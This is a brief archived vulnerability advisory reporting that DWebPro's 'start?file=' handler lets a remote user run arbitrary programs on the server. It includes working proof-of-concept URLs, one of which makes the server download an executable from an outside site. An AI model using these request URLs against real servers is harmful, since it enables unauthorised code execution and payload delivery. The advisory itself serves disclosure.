TUCoPS :: HP Unsorted D :: bt-21837.htm

DWebPro allow an invader to execute any program at server side
DWebPro allow an invader to execute any program at server side
DWebPro allow an invader to execute any program at server side


The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe¶ms=C:\hi.txt 

And the notepad.exe will open a txt file that calls hi at C:\ server's side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at server side and download the file. 

It's really dangerous.

I tested this at last version but may work at older versions as well.

Best Regards,

Rafael Sousa

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH